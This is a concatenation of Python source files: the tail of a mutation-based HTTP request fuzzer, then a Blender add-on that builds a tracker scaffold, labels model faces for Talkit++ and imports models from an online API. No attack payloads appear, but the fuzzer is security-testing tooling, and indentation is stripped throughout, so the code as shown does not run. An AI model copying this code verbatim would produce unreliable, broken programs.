base_input = InputTree(self.grammar, seed, "http://hostname/uri", False)
base_input.build_tree(base_input.root)
mutator = Mutator(self.symbol_mutation_types, self.char_pool, base_input, seed, self.min_num_mutations, self.max_num_mutations, self.verbose)
mutator.mutate_input()
responses = self.get_responses(seed, base_input)
responses_list.append("{} ***** {} ***** {} ***** {}".format(seed, base_input.tree_to_request(), responses, mutator.mutation_messages))
_queue.put(responses_list)
def run_individual(self, seeds, _queue):
responses_list = []
for seed in seeds:
base_input = InputTree(self.grammar, seed, "http://hostname/uri", False)
base_input.build_tree(base_input.root)
mutator = Mutator(self.symbol_mutation_types, self.char_pool, base_input, seed, self.min_num_mutations, self.max_num_mutations, self.verbose)
mutator.mutate_input()
responses = self.get_responses(seed, base_input)
responses_list.append("{} ***** {} ***** {} ***** {}".format(seed, base_input.tree_to_request(), responses, mutator.mutation_messages))
_queue.put(responses_list)
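    # run_individual() currently mirrors run() line for line; presumably kept separate so the
    # individual-seed and batch entry points can diverge independently later.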
args = _parse_args()
start = time.time()
fuzzer = Fuzzer(args.verbose, args.seed, args.outfilename, args.seedfile)
if args.individual_mode:
fuzzer.blackbox_fuzz_individual(fuzzer.seedfile, [fuzzer.seed])
else:
fuzzer.blackbox_fuzz_parallel_batch()
print(time.time() - start)
|
magicaddon.py
|
import bpy
from bpy.props import *
import bmesh
import pickle
import math
import mathutils
import json
import requests
from collections import OrderedDict
from scipy.spatial import distance
import threading
import time
import gzip, zlib
import numpy as np
from io import BytesIO
###############################################################################################
#### We define the addon information in this structure: #########################
#### name,author,version,blender support,location in blender UI, #########################
#### description,category,etc. #########################
###############################################################################################
bl_info = \
{
"name" : "Magic Maker",
"author" : "Lei Shi <ls776@cornell.edu>, Ricardo Gonzalez <re.gonzalez10@uniandes.edu.co>",
"version" : (2, 0, 1),
"blender" : (2, 7, 9),
"location" : "View 3D > Magic Tools-Maker",
"description" :"This tool is used to design models for Talkit++, by labelling surfaces in the model",
"warning" : "",
"wiki_url" : "",
"tracker_url" : "",
"category" : "Development",
}
def download_file(url):
local_filename = url.split('/')[-1]
# NOTE the stream=True parameter below
with requests.get(url, stream=True) as r:
r.raise_for_status()
with open(local_filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
# f.flush()
return local_filename
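# download_file() streams the response in 8 KB chunks so large files are never held fully in
# memory; the file is written to the current working directory under its URL basename.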
def writeFile(fileName,data):
with open(fileName + ".json", 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
def writeFilePickle(fileName,newdata):
pickle.dump(newdata, open(fileName, "wb"),
protocol=2)
#get transformation matrix from the Blender coordinates to the Tracker coordinates
def solve_affine( p1, p2, p3, p4, s1, s2, s3, s4 ):
x = np.transpose(np.matrix([p1,p2,p3,p4]))
y = np.transpose(np.matrix([s1,s2,s3,s4]))
x = np.vstack((x,[1,1,1,1]))
y = np.vstack((y,[1,1,1,1]))
mtx = y * x.I
# return function that takes input x and transforms it
# don't need to return the 4th row as it is
return mtx
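# solve_affine stacks the four Blender points and their four Tracker targets as homogeneous
# 4x4 matrices X and Y and returns M = Y * X^-1, so that M maps any homogeneous Blender
# coordinate into the Tracker frame (used by solve_point and solve_normal below, with w = 1
# for points and w = 0 for normals).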
#enter a point X in Blender coordinates, and transformation matrix to get its Tracker coordinates
def solve_point(x, trans):
result= (trans*np.vstack((np.matrix(x).reshape(3,1),1)))[0:3,:].tolist()
return [result[0][0],result[1][0],result[2][0]]
#enter a normal X in Blender coordinates, and transformation matrix to get its Tracker coordinates
def solve_normal(x, trans):
result= (trans*np.vstack((np.matrix(x).reshape(3,1),0)))[0:3,:].tolist()
return [result[0][0],result[1][0],result[2][0]]
#for initialize the transformation matrix
#calculate the euclidean distance between pt1 and pt2
def calDistance(pt1,pt2):
return distance.euclidean(pt1,pt2)
#for initialize the transformation matrix
#scale a list with a value (scale)
def calScaledList(scale,list):
return [x * scale for x in list]
def faceptsCompare(faceA,faceB):
for ptA in faceA:
for ptB in faceB:
if ptA == ptB:
return True
return False
#blenderFace object
#store information for a face
class blenderFace:
def __init__(self, rawFace, mtx):
#for marked face, it has more information
#with the len == 4
if len(rawFace)==4:
            #marked face
self.marked=True
self.blender_index = rawFace[0][0]
self.area_id = rawFace[0][4]
self.label = rawFace[0][1]
self.content = rawFace[0][2]
self.gesture = rawFace[0][3]
self.blender_color = [x * 255 for x in rawFace[1]]
self.normal = rawFace[3]
self.verts = rawFace[2]
self.vertsConverted = []
self.vertsConverted_2d = []
self.relatedFaces = []
for eachPt in self.verts:
self.vertsConverted.append(solve_point(eachPt, mtx))
self.normalConverted= solve_normal(self.normal, mtx)
else:
#unmarked face
self.marked = False
self.verts = rawFace[0]
self.normal = rawFace[1]
self.blender_index = rawFace[2]
self.label = "unmarked"
self.content = "null"
self.gesture = "null"
self.vertsConverted = []
self.vertsConverted_2d = []
self.relatedFaces = []
for eachPt in self.verts:
self.vertsConverted.append(solve_point(eachPt, mtx))
self.normalConverted = solve_normal(self.normal, mtx)
#blenderPoint object
#store information for a point
class blenderPoint:
def __init__(self, coordinates, faceIndex, mtx):
self.vert = coordinates[:]
self.faceIndex = [faceIndex]
self.vertsConverted = solve_point(self.vert, mtx)
def addFace(self, faceIndex):
self.faceIndex.append(faceIndex)
#read blender pickle file and save them as blenderFace or blenderPoint
class blenderReader:
#initialize the reader with the pickle file address
def __init__(self,fileAddress):
import datetime
currentDT = datetime.datetime.now()
print ("load file" + str(currentDT))
file = open(fileAddress, "rb")
#blenderData is encoded as [(xy,yz),(marked face),(unmarked face), (name, introduction)]
self.data = pickle.load(file)
self.blenderData = self.data[0]
file.close()
print ("finish loading" + str(datetime.datetime.now()))
#variables for finding the transformation matrix
self.vertsXZ = self.blenderData[0][0][:]
self.vertsYZ = self.blenderData[0][1][:]
self.generalInfo = self.blenderData[3]
#print self.generalInfo
#self.unitSize = 14.0/30.0
self.unitSize = 14.0 / 30.0
print ("start tranformation matrix" + str(datetime.datetime.now()))
self.transMtx = self.initialTrans() #no need to check this one
print ("start marked faces" + str(datetime.datetime.now()))
self.markedFaces = self.initialMarked()
print ("start unmarked faces" + str(datetime.datetime.now()))
self.unmarkedFaces = self.initialUnmarked()
self.allFaces = self.markedFaces[:]+self.unmarkedFaces[:]
print ("start related faces" + str(datetime.datetime.now()))
self.findrelatedFaces()
print ("finish related faces"+ str(datetime.datetime.now()))
#self.allPoints = self.getAllpoints()
def initialTrans(self):
#identify four key points from the data
#find the unique one (A) in xz face
for vertXZ in self.vertsXZ:
if vertXZ not in self.vertsYZ:
self.A=vertXZ[:]
#find the unique one (D) in yz face
for vertYZ in self.vertsYZ:
if vertYZ not in self.vertsXZ:
self.D=vertYZ[:]
#find the B and C point
TempResult=[]
for element in self.vertsXZ:
if element in self.vertsYZ:
TempResult.append(element)
dis1=calDistance(TempResult[0],self.A)
dis2=calDistance(TempResult[1],self.A)
if dis1 > dis2:
self.B=TempResult[1][:]
self.C=TempResult[0][:]
else:
self.C=TempResult[1][:]
self.B=TempResult[0][:]
#print self.A, self.B, self.C, self.D
#find the real coordinates of these points
self.ptC=calScaledList(self.unitSize,[-5.04229,0,-8.4463])
self.ptB=calScaledList(self.unitSize,[-5.04229,0,-8.4463+2.04945])
self.ptA=calScaledList(self.unitSize,[-5.04229+4.03073,0,-8.4463+2.04945])
self.ptD=calScaledList(self.unitSize,[-5.04229,4.98983,-8.4463])
mtx = solve_affine(self.A, self.B, self.C, self.D, self.ptA, self.ptB, self.ptC, self.ptD)
return mtx
def initialMarked(self):
markedFaces=[]
#Marked face, self.blenderData[1], is encoded as:
#[[(blender_index, label, content, gesture), blender_color, verts, normal]...]
for face in self.blenderData[1]:
markedFaces.append(blenderFace(face, self.transMtx))
return markedFaces
def initialUnmarked(self):
unmarkedFaces=[]
        #Unmarked face, self.blenderData[2], is encoded as:
        #[[faceVerts, faceNormal, blender_index]...]
for face in self.blenderData[2]:
if len(face[0]) == 3:
unmarkedFaces.append(blenderFace(face, self.transMtx))
return unmarkedFaces
def findrelatedFaces(self):
faceMap = self.data[1]
pointMap = self.data[2]
relatedFaces = {}
oldIdxToNewIdx = {}
for face in faceMap:
if face not in relatedFaces:
relatedFaces[face] = set()
for point in faceMap.get(face):
for fIndex in pointMap.get(point):
relatedFaces.get(face).add(fIndex)
for faceIdx in range(len(self.allFaces)):
oldIdxToNewIdx[self.allFaces[faceIdx].blender_index] = faceIdx
for faceIdx in range(len(self.allFaces)):
faceOldIndex = self.allFaces[faceIdx].blender_index
tempSet = relatedFaces.get(str(faceOldIndex))
for faceR in tempSet:
self.allFaces[faceIdx].relatedFaces.append(oldIdxToNewIdx[faceR])
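    # Two faces are "related" when they share at least one vertex: faceMap lists the points
    # of each face, pointMap lists the faces touching each point, and the original Blender
    # face indices are finally remapped to positions inside self.allFaces.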
class cls_AreaData(bpy.types.PropertyGroup):
bl_options = {'REGISTER', 'UNDO'}
# The properties for this class which is referenced as an 'entry' below.
area_index = bpy.props.IntProperty(name="Index", description="index for designated faces", default=0)
area_label = bpy.props.StringProperty(name="Label", description="Label", default="")
area_content = bpy.props.StringProperty(name="Content", description="Content", default="")
area_gesture = bpy.props.StringProperty(name="Gesture", description="Gesture", default="")
area_color = bpy.props.FloatVectorProperty(
name="Color",
subtype="COLOR",
size=4,
min=0.0,
max=1.0,
default=(1.0, 1.0, 1.0, 1.0)
)
###############################################################################################
#### This class is used to debug errors and #########################
#### inform the user about mistakes. #########################
#### Pops up a dialog window with the given message #########################
###############################################################################################
class MessageOperator(bpy.types.Operator):
bl_idname = "error.message"
bl_label = "Message"
### Properties set when the error dialog is invoked
### type: Type of error
### message: Content of the error dialog
type = StringProperty()
message = StringProperty()
def execute(self, context):
self.report({'INFO'}, self.message)
print(self.message)
return {'FINISHED'}
def invoke(self, context, event):
wm = context.window_manager
### Set dialog window size and invoking
return wm.invoke_popup(self, width=800, height=400)
def draw(self, context):
### Defining the structure of the window dialog
self.layout.label("ERROR! Check the message for more info")
row = self.layout.split(0.25)
row.prop(self, "type")
row.prop(self, "message")
row = self.layout.split(0.80)
row.label("")
### Adding ok button to close the window
row.operator("error.ok")
###############################################################################################
#### #########################
#### The OK button used in the error dialog #########################
#### #########################
###############################################################################################
class OkOperator(bpy.types.Operator):
bl_idname = "error.ok"
bl_label = "OK"
def execute(self, context):
return {'FINISHED'}
###############################################################################################
#### Make material function #########################
#### This function creates the material that will be used to label##########################
#### the model #########################
###############################################################################################
def makeMaterial(name, diffuse, alpha, specular=(1, 1, 1)):
mat = bpy.data.materials.new(name)
mat.diffuse_color = diffuse
mat.diffuse_shader = 'LAMBERT'
mat.diffuse_intensity = 1.0
mat.specular_color = specular
mat.specular_shader = 'COOKTORR'
mat.specular_intensity = 0.5
mat.alpha = alpha
mat.ambient = 1
return mat
def mergeObjects(self,context):
obs = []
scenario = context.scene
for ob in scenario.objects:
# whatever objects you want to join...
if ob.type == 'MESH':
obs.append(ob)
ctx = bpy.context.copy()
# one of the objects to join
ctx['active_object'] = obs[1]
ctx['selected_objects'] = obs
# we need the scene bases as well for joining
ctx['selected_editable_bases'] = [scenario.object_bases[ob.name] for ob in obs]
bpy.ops.object.join(ctx)
ob = bpy.context.active_object
label = context.scene.inputLabel_hotarea
color = context.scene.inputColor_hotarea[:]
content = context.scene.inputContent_hotarea
gesture = context.scene.inputGesture_hotarea
i=0
for i in range(3):
ob.area_list.add()
ob.area_list[-1].area_index = len(ob.area_list) -1
ob.area_list[-1].area_label = "Scaffold"
ob.area_list[-1].area_content = "This is the scaffold of the model"
ob.area_list[-1].area_gesture = "nothing"
ob.area_list[-1].area_color = [0,0,0,0]
i+=1
return {"FINISHED"}
###############################################################################################
#### Add Scaffold function #######################
#### This function creates and adds the tracker scaffold to the scene#######################
#### #######################
###############################################################################################
def makeScaffold(self,context):
### Define Scaffold 82 Vertices
Vertices = \
[
mathutils.Vector((-29.99028968811035, -6.8105974197387695, -9.081909229280427e-05)),
mathutils.Vector((-29.99028968811035, -6.8105974197387695, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 10.22175121307373, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 10.22175121307373, -9.081909229280427e-05)),
mathutils.Vector((-19.942604064941406, -6.8105974197387695, 8.446209907531738)),
mathutils.Vector((-19.942604064941406, 10.22175121307373, 8.446209907531738)),
mathutils.Vector((-19.942604064941406, -6.8105974197387695, -9.081909229280427e-05)),
mathutils.Vector((-19.942604064941406, 10.22175121307373, -9.081909229280427e-05)),
mathutils.Vector((-25.95956802368164, 35.02724838256836, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 35.02724838256836, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 35.02724838256836, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 35.02724838256836, 2.3965096473693848)),
mathutils.Vector((-23.894927978515625, 35.02724838256836, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 35.02724838256836, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 35.02724838256836, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 35.02724838256836, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 35.02724838256836, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 35.02724838256836, 6.396751880645752)),
mathutils.Vector((-24.948001861572266, 35.02724838256836, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 35.02724838256836, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 35.02724838256836, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 15.067978858947754, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 10.078160285949707, 8.446209907531738)),
mathutils.Vector((-24.948001861572266, 10.078160285949707, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 20.057796478271484, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 25.04761505126953, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 30.037431716918945, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 15.067978858947754, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 20.057796478271484, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 25.04761505126953, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 30.037431716918945, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 10.078160285949707, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 15.067978858947754, 6.396751880645752)),
mathutils.Vector((-19.90571403503418, 10.078160285949707, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 10.078160285949707, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 15.067978858947754, 6.396751880645752)),
mathutils.Vector((-19.90571403503418, 20.057796478271484, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 20.057796478271484, 6.396751880645752)),
mathutils.Vector((-19.90571403503418, 30.037431716918945, 6.396751880645752)),
mathutils.Vector((-19.90571403503418, 25.04761505126953, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 25.04761505126953, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 30.037431716918945, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 15.067978858947754, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 10.078160285949707, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 20.057796478271484, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 30.037431716918945, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 25.04761505126953, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 15.067978858947754, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 10.078160285949707, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 20.057796478271484, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 30.037431716918945, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 25.04761505126953, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 15.067978858947754, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 10.078160285949707, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 20.057796478271484, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 30.037431716918945, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 25.04761505126953, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 15.067978858947754, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 10.078160285949707, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 20.057796478271484, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 30.037431716918945, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 25.04761505126953, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 15.067978858947754, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 10.078160285949707, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 20.057796478271484, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 30.037431716918945, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 25.04761505126953, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 15.067978858947754, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 10.078160285949707, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 20.057796478271484, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 30.037431716918945, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 25.04761505126953, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 15.067978858947754, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 10.078160285949707, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 20.057796478271484, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 30.037431716918945, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 25.04761505126953, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 15.067978858947754, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 10.078160285949707, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 20.057796478271484, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 30.037431716918945, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 25.04761505126953, 4.396630764007568))
]
### Define the mesh we are adding as "Scaffold"
### If there is already an item called "Scaffold", it will
### automatically add the mesh with the name "Scaffold.001"
NewMesh = bpy.data.meshes.new("Scaffold")
### We define how the mesh will be built
### First we send the Vertices (Defined previously)
### Then we send the faces that will compose the Scaffold
### (156 triangular faces), Each face is built by using
### 3 of the vertices in the list of vertices given.
NewMesh.from_pydata \
(
Vertices,
[],
[[23,48,43],[0, 1, 2], [0, 2, 3], [1, 4, 5], [1, 5, 2], [4,6,7], [4,7,5], [6,0,3], [6,3,7], [1,0,6], [6,4,1], [2,7,3], [7,2,5], [8,9,10], [11,9,8], [11,8,12], [13,11,12], [12,8,14], [12,14,15], [18,14,16], [19,20,15], [15,18,19], [18,15,14], [21,22,23], [24,21,23], [24,18,25], [26,18,16], [18,26,25], [24,23,18], [27,28,23], [18,23,28], [18,28,29], [30,18,29], [18,30,19], [31,27,23], [32,33,34], [32,34,35], [36,32,35], [36,35,37], [38,39,40], [38,40,41], [20,38,41], [20,41,15], [39,36,37], [39,37,40], [42,43,22], [21,44,42],[42,22,21], [44,21,24], [45,46,25], [45,25,26], [17,45,26], [46,44,24], [46,24,25], [27,31,33], [27,33,32], [28,27,32], [28,32,36], [30,29,39], [30,39,38], [19,30,38], [19,38,20], [29,28,36], [29,36,39], [47,48,43], [47,43,42], [49,47,42], [49,42,44], [50,51,46], [50,46,45], [14,50,45], [14,45,17], [51,49,44], [51,44,46], [52,53,48], [52,48,47], [54,52,47], [54,47,49], [55,56,51], [55,51,50], [8,55,50], [8,50,14], [56,54,49], [56,49,51], [57,58,53], [57,53,52], [59,57,52], [59,52,54], [60,61,56], [60,56,55], [10,60,55], [10,55,8], [61,59,54], [61,54,56], [62,63,58], [62,58,57], [64,62,57], [64,57,59], [65,66,61], [65,61,60], [9,65,60], [9,60,10], [66,64,59], [66,59,61], [67,68,63], [67,63,62], [69,67,62], [69,62,64], [70,71,66], [70,66,65], [11,70,65], [11,65,9], [71,69,64], [71,64,66], [72,73,68], [72,68,67], [74,72,67], [74,67,69], [75,76,71], [75,71,70], [13,75,70], [13,70,11], [76,74,69], [76,69,71], [77,78,73], [77,73,72], [79,77,72], [79,72,74], [80,81,76], [80,76,75], [12,80,75], [12,75,13], [81,74,76], [35,34,78], [35,78,77], [37,35,77], [37,77,79], [41,40,81], [81,74,79],[41,81,80], [15,41,80], [15,80,12], [40,37,79], [40,79,81], [58,63,53], [63,68,78], [63,78,53], [43,23,22], [48,53,78], [48,78,34], [73,78,68], [31,23,34], [34,23,48], [34,33,31],[16,14,17],[16,26,17]]
)
NewMesh.update()
NewObj = bpy.data.objects.new("Scaffold", NewMesh)
### linking the new object to the scene
context.scene.objects.link(NewObj)
### We select the object to add xzFace and yzFace materials
context.scene.objects.active = NewObj
ob = bpy.context.object
current_mode = bpy.context.object.mode
### Check in which mode we are to handle errors
if current_mode != 'EDIT' :
bpy.ops.object.editmode_toggle()
    # If the material already exists, don't create a new one
matxz = bpy.data.materials.get("xzFace")
matyz = bpy.data.materials.get("yzFace")
main = bpy.data.materials.new("mainBody")
if matxz is None:
# create material if it doesn't exist
matxz = bpy.data.materials.new(name="xzFace")
matyz = bpy.data.materials.new(name="yzFace")
main = bpy.data.materials.new(name="mainBody")
### Add each of the 3 materials that compose the scaffold
### and give them color
ob.data.materials.append(main)
### White for the mainbody
bpy.data.materials['mainBody'].diffuse_color = (1,1,1)
### Red for the xz plane face
ob.data.materials.append(matxz)
bpy.data.materials['xzFace'].diffuse_color = (1,0,0)
### Blue for the yz plane face
ob.data.materials.append(matyz)
bpy.data.materials['yzFace'].diffuse_color = (0,0,1)
mesh = ob.data
if bpy.context.object.mode != 'EDIT' :
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.remove_doubles(threshold=0.0001)
bm = bmesh.from_edit_mesh(mesh)
if hasattr(bm.faces, "ensure_lookup_table"):
bm.faces.ensure_lookup_table()
### We add the materials xzFace and yzFace to 2 specific faces in
### the scaffold to have a point of reference.
bm.faces[155].material_index = 2
bm.faces[154].material_index = 1
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.normals_make_consistent(inside=False)
bpy.ops.object.editmode_toggle()
return {"FINISHED"}
###############################################################################################
#### Tool panel creation class ##########################
#### With this class we create the panel that will have access to ##########################
#### all of our functionalities: Exporting the model to stl, ##########################
#### labeling each face of the model, decimating the model, adding##########################
#### tracker scaffold ##########################
###############################################################################################
class ToolsPanel(bpy.types.Panel):
### We define the name and the location of the tool
bl_label = "Magic Tools-Marker"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "MAGIC"
def draw(self, context):
layout = self.layout
### First we define the section related to model modification
layout.label("MODIFICATION", icon="MATCUBE")
row = layout.row(align=True)
box = row.box()
###Input areas and labels for users
box.prop(context.scene, "export_model")
box.prop(context.scene, "export_model_file")
### Buttons that call for the functionalities
box.operator("magic.marker", text="Add tracker scaffold").operation = "add"
box.operator("magic.marker", text="Merge object with tracker scaffold").operation = "merge"
box.operator("magic.marker", text="Export stl printable model").operation = "stl"
box.operator("magic.marker", text="Decimate model (simplify)").operation = "decimate"
### We add an empty whitespace that separates the sections
layout.separator()
### We define the section related to the model "face labeling"
layout.label("LABELS", icon="ORTHO")
row = layout.row(align=True)
box = row.box()
###Input areas and labels for users
box.prop(context.scene, "inputLabel_hotarea")
box.prop(context.scene, "inputContent_hotarea")
box.prop(context.scene, "inputGesture_hotarea")
sub = box.row(True)
sub.prop(context.scene, "inputColor_hotarea")
### Buttons that call for the functionalities
box.operator("magic.hotarea", text="confirm").operation = "add"
box.operator("magic.hotarea", text="Delete selected area").operation = "clean"
### We add an empty whitespace that separates the sections
layout.separator()
### We define the last section, related to the model export
layout.label("EXPORT AND IMPORT", icon="FILESEL")
row = layout.row(align=True)
box = row.box()
###Input areas and labels for users
box.prop(context.scene, "inputName_model")
box.prop(context.scene, "inputIntroduction_model")
box.prop(context.scene, "export_path")
box.prop(context.scene, "import_path")
### Buttons that call for the functionalities
box.operator("magic.export", text="export")
box.operator("magic.import", text="import")
layout.separator()
layout.label("ONLINE MODELS", icon="FILESEL")
row = layout.row(align=True)
box = row.box()
box.prop(context.scene, "model_id")
box.operator("magic.online_import", text = "import")
###############################################################################################
#### MAGIC_marker operator class #######################
#### In this class we define the functions used in the Modification #######################
#### module: Add Tracker Scaffold, export to stl and decimate the model#####################
###############################################################################################
class MAGIC_marker(bpy.types.Operator):
bl_idname = "magic.marker"
bl_label = "Debugger for model modification"
bl_options = {'REGISTER', 'UNDO'}
operation = bpy.props.StringProperty()
def execute(self, context):
if self.operation == "add":
makeScaffold(self,context)
if self.operation == "merge":
mergeObjects(self,context)
if self.operation == "stl":
path = context.scene.export_model
filename = context.scene.export_model_file
            if filename == ' ' or path == ' ':
                bpy.ops.error.message('INVOKE_DEFAULT',
                    type="Error",
                    message='You are missing the directory path or the name of the file you are trying to export')
                return {'FINISHED'}
            bpy.ops.export_mesh.stl(filepath=path + filename + '.stl')
print("save stl " + str(time.ctime(int(time.time()))))
### We use the error dialog if the user is not selecting a single
### object to decimate
if self.operation == "decimate":
selection = bpy.context.selected_objects
if len(selection) > 1:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='You selected more than one object')
return {'FINISHED'}
if len(selection) == 0:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='Please select one object to decimate')
return {'FINISHED'}
bpy.context.scene.objects.active = selection[0]
mod = selection[0].modifiers.new(name='decimate', type='DECIMATE')
mod.ratio = 0.1
bpy.ops.object.modifier_apply(apply_as="DATA", modifier="decimate")
return {'FINISHED'}
###############################################################################################
#### MAGIC_onlineimport operator class ########################
#### In this class we download a compressed JSON model from the        ########################
#### sensables.org API by id and rebuild its mesh, materials and areas ########################
###############################################################################################
class MAGIC_onlineimport(bpy.types.Operator):
bl_idname = "magic.online_import"
bl_label = "online import"
bl_options = {'REGISTER', 'UNDO'}
operation = bpy.props.StringProperty()
def execute(self, context):
selection = bpy.context.selected_objects
if len(selection) >= 1:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
                message='Deselect all objects before importing an online model')
return {'FINISHED'}
## we get the id of the model
modelid = context.scene.model_id
## we make the request with the id
req = requests.get('https://sensables.org/api/models/' + modelid)
str_decoded = req.content.decode()
jsonform = json.loads(str_decoded)
firstdata = jsonform['Body']['data']
ba = bytearray(firstdata)
newData = zlib.decompress(bytes(ba), 15+32)
newDat = json.loads(newData)
## Copy pasted import method
data = json.loads(newDat)
## Add each vertex to a list - Done
Vertices = []
i=0
for p in data['vertices']:
p = data['vertices'][str(i)]
vector = mathutils.Vector((p))
Vertices.append(vector)
i+=1
## Add each face to a list - Done
Faces = []
i=0
for f in data['faces']:
f = data['faces'][str(i)]['vertices']
Faces.append(f)
i+=1
## Use file name to add the new mesh
NewMesh = bpy.data.meshes.new("modelmesh")
### We define how the mesh will be built
## Use both lists to build the model
NewMesh.from_pydata \
(
Vertices,
[],
Faces
)
NewMesh.update()
context = bpy.context
## Use file name again to link it
NewObj = bpy.data.objects.new("whatever", NewMesh)
### linking the new object to the scene
context.scene.objects.link(NewObj)
### We select the object to add the materials to the face, and also the areas.
context.scene.objects.active = NewObj
ob = bpy.context.object
current_mode = bpy.context.object.mode
### Check in which mode we are to handle errors
if current_mode != 'EDIT' :
bpy.ops.object.editmode_toggle()
### Object data
mesh = ob.data
### Here we start adding the materials
##material = makeMaterial(name=p.name, diffuse=p.color, alpha=p.diffuse)
##mesh.materials.append(material)
i=0
for p in data['materials']:
## Change all of this to makeMaterial when doing in main component
currentData = data['materials'][str(i)]
material = makeMaterial(name=currentData['name'], diffuse=currentData['color'], alpha=currentData['diffuse'])
mesh.materials.append(material)
i+=1
### Here we start adding the areas
i=0
for p in data['areas']:
currentData = data['areas'][str(i)]
ob.area_list.add()
ob.area_list[-1].area_index = currentData['area_index']
ob.area_list[-1].area_label = currentData['area_label']
ob.area_list[-1].area_content = currentData['area_content']
ob.area_list[-1].area_gesture = currentData['area_gesture']
ob.area_list[-1].area_color = currentData['area_color']
i+=1
### Here we paint all the faces depending on their index
mesh = ob.data
if bpy.context.object.mode != 'EDIT' :
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.remove_doubles(threshold=0.0001)
bm = bmesh.from_edit_mesh(mesh)
if hasattr(bm.faces, "ensure_lookup_table"):
bm.faces.ensure_lookup_table()
### We add the materials xzFace and yzFace to 2 specific faces in
### the scaffold to have a point of reference.
i=0
for f in data['faces']:
area_index = data['faces'][str(i)]['area_index']
bm.faces[i].material_index = area_index
i+=1
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.normals_make_consistent(inside=False)
bpy.ops.object.editmode_toggle()
return {'FINISHED'}
###############################################################################################
#### MAGIC_hotarea operator class ########################
#### In this class we define the functions used in the LABELS #######################
#### module: Add label to faces, delete all labels (needs improvement) #####################
###############################################################################################
class MAGIC_hotarea(bpy.types.Operator):
bl_idname = "magic.hotarea"
bl_label = "Debugger for labelling"
bl_options = {'REGISTER', 'UNDO'}
# hotareaInfoStorage = bpy.props.StringProperty()
operation = bpy.props.StringProperty()
def execute(self, context):
selection = bpy.context.selected_objects
if len(selection) > 1:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='You selected more than one object, only select the object you want to label')
return {'FINISHED'}
if len(selection) == 0:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='You have to select the object you want to edit, before labelling the faces.')
return {'FINISHED'}
if self.operation == "add":
self.add(context)
if self.operation == "clean":
self.clean(context)
return {'FINISHED'}
